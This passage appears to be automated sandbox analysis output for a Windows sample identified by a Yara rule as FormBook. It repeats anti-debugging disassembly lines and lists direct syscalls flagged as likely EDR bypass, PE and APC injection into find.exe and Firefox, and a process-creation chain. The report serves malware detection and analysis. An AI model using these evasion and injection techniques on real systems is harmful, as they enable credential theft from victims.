                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F749D0 mov eax, dword ptr fs:[00000030h]3_2_00F749D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD69C0 mov eax, dword ptr fs:[00000030h]3_2_00FD69C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC89B3 mov esi, dword ptr fs:[00000030h]3_2_00FC89B3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC89B3 mov eax, dword ptr fs:[00000030h]3_2_00FC89B3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC89B3 mov eax, dword ptr fs:[00000030h]3_2_00FC89B3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]3_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F409AD mov eax, dword ptr fs:[00000030h]3_2_00F409AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F409AD mov eax, dword ptr fs:[00000030h]3_2_00F409AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC97C mov eax, dword ptr fs:[00000030h]3_2_00FCC97C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE4978 mov eax, dword ptr fs:[00000030h]3_2_00FE4978
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE4978 mov eax, dword ptr fs:[00000030h]3_2_00FE4978
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]3_2_00F66962
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]3_2_00F66962
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]3_2_00F66962
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8096E mov eax, dword ptr fs:[00000030h]3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8096E mov edx, dword ptr fs:[00000030h]3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8096E mov eax, dword ptr fs:[00000030h]3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC0946 mov eax, dword ptr fs:[00000030h]3_2_00FC0946
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010108C0 mov eax, dword ptr fs:[00000030h]3_2_010108C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC892A mov eax, dword ptr fs:[00000030h]3_2_00FC892A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD892B mov eax, dword ptr fs:[00000030h]3_2_00FD892B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100A8E4 mov eax, dword ptr fs:[00000030h]3_2_0100A8E4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38918 mov eax, dword ptr fs:[00000030h]3_2_00F38918
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38918 mov eax, dword ptr fs:[00000030h]3_2_00F38918
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC912 mov eax, dword ptr fs:[00000030h]3_2_00FCC912
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE908 mov eax, dword ptr fs:[00000030h]3_2_00FBE908
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE908 mov eax, dword ptr fs:[00000030h]3_2_00FBE908
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014B00 mov eax, dword ptr fs:[00000030h]3_2_01014B00
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7AAEE mov eax, dword ptr fs:[00000030h]3_2_00F7AAEE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7AAEE mov eax, dword ptr fs:[00000030h]3_2_00F7AAEE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40AD0 mov eax, dword ptr fs:[00000030h]3_2_00F40AD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F74AD0 mov eax, dword ptr fs:[00000030h]3_2_00F74AD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F74AD0 mov eax, dword ptr fs:[00000030h]3_2_00F74AD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01008B28 mov eax, dword ptr fs:[00000030h]3_2_01008B28
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01008B28 mov eax, dword ptr fs:[00000030h]3_2_01008B28
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]3_2_00F96ACC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]3_2_00F96ACC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]3_2_00F96ACC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100AB40 mov eax, dword ptr fs:[00000030h]3_2_0100AB40
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48AA0 mov eax, dword ptr fs:[00000030h]3_2_00F48AA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48AA0 mov eax, dword ptr fs:[00000030h]3_2_00F48AA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]3_2_01012B57
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]3_2_01012B57
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]3_2_01012B57
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]3_2_01012B57
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F96AA4 mov eax, dword ptr fs:[00000030h]3_2_00F96AA4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78A90 mov edx, dword ptr fs:[00000030h]3_2_00F78A90
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]3_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBCA72 mov eax, dword ptr fs:[00000030h]3_2_00FBCA72
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBCA72 mov eax, dword ptr fs:[00000030h]3_2_00FBCA72
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]3_2_00F7CA6F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]3_2_00F7CA6F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]3_2_00F7CA6F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEEA60 mov eax, dword ptr fs:[00000030h]3_2_00FEEA60
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]3_2_00F46A50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50A5B mov eax, dword ptr fs:[00000030h]3_2_00F50A5B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50A5B mov eax, dword ptr fs:[00000030h]3_2_00F50A5B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F64A35 mov eax, dword ptr fs:[00000030h]3_2_00F64A35
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F64A35 mov eax, dword ptr fs:[00000030h]3_2_00F64A35
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7CA38 mov eax, dword ptr fs:[00000030h]3_2_00F7CA38
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7CA24 mov eax, dword ptr fs:[00000030h]3_2_00F7CA24
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6EA2E mov eax, dword ptr fs:[00000030h]3_2_00F6EA2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCCA11 mov eax, dword ptr fs:[00000030h]3_2_00FCCA11
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]3_2_00F48BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]3_2_00F48BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]3_2_00F48BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6EBFC mov eax, dword ptr fs:[00000030h]3_2_00F6EBFC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCCBF0 mov eax, dword ptr fs:[00000030h]3_2_00FCCBF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEEBD0 mov eax, dword ptr fs:[00000030h]3_2_00FEEBD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]3_2_00F40BCD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]3_2_00F40BCD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]3_2_00F40BCD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]3_2_00F60BCB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]3_2_00F60BCB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]3_2_00F60BCB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50BBE mov eax, dword ptr fs:[00000030h]3_2_00F50BBE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50BBE mov eax, dword ptr fs:[00000030h]3_2_00F50BBE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]3_2_00FF4BB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]3_2_00FF4BB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014A80 mov eax, dword ptr fs:[00000030h]3_2_01014A80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3CB7E mov eax, dword ptr fs:[00000030h]3_2_00F3CB7E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38B50 mov eax, dword ptr fs:[00000030h]3_2_00F38B50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEEB50 mov eax, dword ptr fs:[00000030h]3_2_00FEEB50
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF4B4B mov eax, dword ptr fs:[00000030h]3_2_00FF4B4B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF4B4B mov eax, dword ptr fs:[00000030h]3_2_00FF4B4B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE8B42 mov eax, dword ptr fs:[00000030h]3_2_00FE8B42
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6B40 mov eax, dword ptr fs:[00000030h]3_2_00FD6B40
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6B40 mov eax, dword ptr fs:[00000030h]3_2_00FD6B40
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtClose: Direct from: 0x77462B6C
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\find.exeThread register set: target process: 3040Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\find.exeThread APC queued: target process: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                      Source: YpbicUfTwt.exe, 00000004.00000002.3863374097.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000000.1493657431.0000000001711000.00000002.00000001.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863464890.0000000001A91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
